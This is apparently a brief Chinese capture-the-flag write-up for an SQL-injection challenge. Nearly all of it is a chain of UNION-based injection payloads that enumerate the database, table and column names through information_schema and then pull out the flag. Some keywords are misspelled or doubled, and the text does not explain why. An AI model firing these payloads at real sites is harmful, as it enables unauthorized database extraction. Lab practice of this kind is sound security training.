SQL注入（斗宗强者恐怖如斯复现）

斗宗强者恐怖如斯

构造payload

name：admin&passward:123

注入后得到如下页面

？id=-1') union selsct 1,2,3--+

？id=-1') union selsct 1,2,database()--+,爆数据库

?id=-1')union select 1,2,group_concat(table_name) from infoorrmation_schema.tables where table_schema='xitif_sql' --+，爆表名

?id=-1')union select 1,2,group_concat(column_name) from infoorrmation_schema.columns where table_name='flag'--+

?id=-1')union select 1,2,group_concat(flAg) from xitif_sql.flag--+

得到flag